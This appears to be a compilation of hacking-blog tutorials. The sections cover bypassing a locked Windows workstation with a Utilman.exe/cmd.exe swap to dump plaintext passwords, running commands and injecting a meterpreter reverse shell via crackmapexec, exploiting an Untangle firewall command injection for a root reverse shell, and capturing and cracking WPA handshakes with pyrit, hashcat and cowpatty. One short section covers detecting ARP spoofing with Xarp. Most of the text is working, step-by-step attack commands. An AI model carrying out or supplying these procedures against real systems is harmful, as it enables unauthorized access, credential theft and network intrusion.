Hack Locked Workstation Password in Clear Text

For this tutorial we will be using kali Linux iso which can be found on their official website and wce(windows credentials editor) which can be found at 

http://www.ampliasecurity.com/research/windows-credentials-editor/

Download the universal version if you don’t know the target system architecture (32 bit or 64 bit).

Windows Credentials Editor (WCE) is a security tool to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes, plaintext passwords and Kerberos tickets).

First of all make your pen drive bootable with kali linux (you can choose any other linux distro) and then copy the wce.exe to the pen drive and then boot up the kali linux with the PD on target system  and from the boot menu choose Live boot option and hit enter.

Now after OS boots up go to File Manager and browse to other locations and choose the 16 GB volume (size of the windows installation which will be different in your case).

Now browse to the Windows/System32 folder.

Now rename the Utilman.exe file to any other name and then rename the cmd.exe to Utilman.exe.

Now restart the system but this time doesn’t boot the system to kali Linux, let it boot to the installed windows and you will be presented with password screen after choosing the user.

At the password screen to lower left side a blue icon named ease of access will be present, click on it and a command windows will be opened

Now you have to execute the wce.exe file in the pd so type the following command to know the external devices connected:

diskpart  (a windows command line utility which enables us to manage disk and partitions)

and then on diskpart prompt type command:

list volume (show all the connected drives)

Now choose the FAT32 Fs type drive (to be sure also confirm the drive name with the size of your pen drive)

In my case it is F. Now exit the diskpart by pressing ctrl^c.

So now browse to the pd by typing the following command: f:  (Here f is the drive letter name In your case it could be different) and then execute the wce.exe file which you copied previously with command:

wce.exe –w (-w is used to dump all the passwords in clear text)

As you can see it has successfully dumped the password in clear text.

Penetration Testing in Windows/Active Directory with Crackmapexec

Crackmapexec is a swiss army knife for pentesting Windows/Active Directory environments. Active Directory (AD) is a directory service that Microsoft developed for Windows domain networks. It is included in most Windows Server operating systems as a set of processes and services.

First of all, to install crackmapexec run the following commands:

apt-get install -y libssl-dev libffi-dev python-dev build-essential

I have already installed all the requirements that is why because it is showing already installed but you have to install them.

Now we will create a virtual environment for  crackmapexec with virtualenvwrapper.

virtualenvwrapper is a set of extensions to virtualenv tool. The extensions include wrappers for creating and deleting virtual environments and otherwise managing your development workflow, making it easier to work on more than one project at a time without introducing conflicts in their dependencies.

apt-get install virtualenvwrapper

source /usr/share/virtualenvwrapper/virtualenvwrapper.sh

mkvirtualenv CME

pip install git+https://github.com/CoreSecurity/impacket

pip install crackmapexec







Now to execute a windows command remotely run the following command:

crackmapexec 192.168.0.104 –u administrator –p  ‘Igni*******’ –x whoami

As you can see the server is Pwned and the output of the command is rajlab\administrator.

Here 192.168.0.104 is the server IP running active directory service in the network.

We can also execute a powershell command:

crackmapexec 192.168.0.104 –u administrator –p  ‘Igni*******’ –X  ‘$PSVersionTable’

The command is executed successfully and the output can be seen as the version of the powershell.

If we don’t know the active directory server we can run crackmapexec on the whole network by giving the network range as in my case 192.168.0.0/24.

Now comes the turn to get a meterpreter shell , so start  metasploit with command msfconsole in a new terminal and set up the reverse handler :

use exploit/multi/handler

set payload windows/meterpreter/reverse_https

set lhost 192.168.0.132

set lport 444

exploit

Now on the previous terminal run command:

crackmapexec 192.168.0.104 -u administrator -p  Ign******* -M metinject –o LHOST=192.168.0.132 LPORT=444

As you can see payload is executed successfully and a powershell script Invoke-Shellcode.ps1 is executed to gets the reverse meterpreter shell using the metinject module to directly inject meterpreter into memory.

Here –M is the Module to use.

As you can see we got the meterpreter shell.

Author: Himanshu Gupta is an InfoSec Researcher | Technical writer. You can follow him on LinkedIn .

Hack Untangle NG Firewall using command Injection Vulnerability

Untangle’s NG Firewall enables us to quickly and easily create the network policies that deliver the perfect balance between security and productivity.

Untangle NGFW <= v12.1.0 beta execEvil() authenticated root CI exploit. A command injection vulnerability exists in Untangle NG Firewall, which allows non-root authenticated users to execute system commands with root privileges. This exploit has been tested on Untangle NG Firewall versions 11.2, 12, 12.0.1, and 12.1.0 beta, but should work on previous versions. The client-side sanitisation issues identified in the disclosure post can be exploited with a web app proxy.

First of all clone the the github repo of the exploit and enter in the directory with command:

git clone https://github.com/3xocyte/Exploits && cd Exploits

and now give the python script permission to execute with command:

chmod +x untangle-ngfw-12.1-ci.py

Now set the netcat listener at port 443  for ssl connection in a new terminal with command:

ncat  --ssl  -nlvp 443

Now execute the python script with command:

python untangle-ngfw-12.1-ci.py  192.168.2.1   192.168.2.3  admin  admin

Here 192.168.2.1 is the Untangle firewall IP and 192.168.2.3 is our system IP and username , password of the Untangle Firewall are admin , admin .

As soon as the above command is successfully executed we get the reverse shell.

How to Detect Sniffer in Your Network

Xarp is an advanced anti spoofing tool that flags all the spoofing attacks that might be using ARP(address resolution protocol) targeting your system. This includes documents, emails and VoiceIP conversations.  ARP attacks allows hacker to manipulate the data sent over the network. Xarp uses active and passive modules to detect hackers inside the network. Having such tools in the system is very important as the computer firewalls and OS security do not provide protection against ARP attacks.

Download latest Xarp version from http://xarp.software.informer.com/download/

After it gets downloaded, install it in your computer. Now,we will perform an attack on a system with Xarp installed  To show this tool’s effectiveness, we perform the attack with Bettercap

As soon as Xarp detects an ARP attack, it shows an alert on the screen like this.

 It is to be noted that there was no such alert or blocking from both windows firewall and defender, but Xarp detects the intrusion and warns about it.

Author- Shivam Yadav is a certified ethical hacker, an enthusiast and a researcher in this field.

3 Ways to Crack Wifi using Pyrit, oclHashcat and Cowpatty

First start the monitor mode on our wireless adaptor .

airmon-ng start wlan0

Now the monitor mode is enabled with name wlan0mon.

and then with the following command start listening to all the available wifi connections:

airodump-ng wlan0mon

After running the above command it will start listening all the wifi traffic nearby so wait till your target appears and then hit ctrl^c.

Now we have to listen to a specific channel on which the target is present . Now run command:

airodump-ng -c 2 --bssid 3C:1E:04:XX:XX:XX --write sommay wlan0mon

-c == channel number of the target (2 in my case , see the CH column)

--bssid == MAC address of the target AP

--write == name of the capture file

Now wait till the WPA handshake is captured and then hit crtl^c.

Now a file named sommay-01.cap will be generated.

PYRIT

First method to crack the password from the capture file is PYRIT . We will use dictionary-attack so run command:

pyrit -i /usr/share/nmap/nselib/data/password.lst -r sommay-01.cap attack_passthrough

-i == path to the input file in our case  it is the path to dictionary

-r ==  path to the captured fle which ( in our case it is sommay-01.cap)

attack_passthrough == this options is to specify that a dictionary attack is to be performed

As you can see it has successfully cracked the password. 

OCLHASHCAT

First of all download oclhashcat from its official website: https://hashcat.net/files/hashcat-2.00.7z

First we have to convert the .cap file we captured with airodump-ng previously  to .hccap with aircrack-ng  by command:

aircrack-ng sommay-01.cap -J sommay-01

-J == the path to the output file with extension .hccap

Now copy the dictionary you want to use in the Hashcat folder.

Now enter in the hashcat folder and run command:

./hashcat-cli64.bin -m 2500 /root/sommay-01.hccap passwords.lst

In above command if you are using 32 bit system replace 64 with 32.

-m is the hash type  which is 2500 for WPA/WPA2 cracking

then give the path to .hccap file which you converted with aircrack-ng.

and then the name of the dictionary file

As you can see it has successfully cracked the password.

coWPAtty

For cracking with the help of cowpatty we have to first generate the hash file specific to the target AP. For this we will use genpmk so run command:

genpmk -f passwords.lst -d cowpatty_dict -s SOMMAY

-f == path to the dictionary file

-d == name of the output dictionary

-s == ESSID(Name) of the target AP(The name should be identical to the target AP)

Now it will generate a dictionary file named cowpatty_dict which will speed up the cracking process.

Now run command :

cowpatty  -d cowpatty_dict -r sommay-01.cap -s SOMMAY

-d == path to dictionary we generated with genpmk

-r == path to the capture file we generated with airodump-ng

-s == ESSID of the target AP(The name should be identical to the target AP)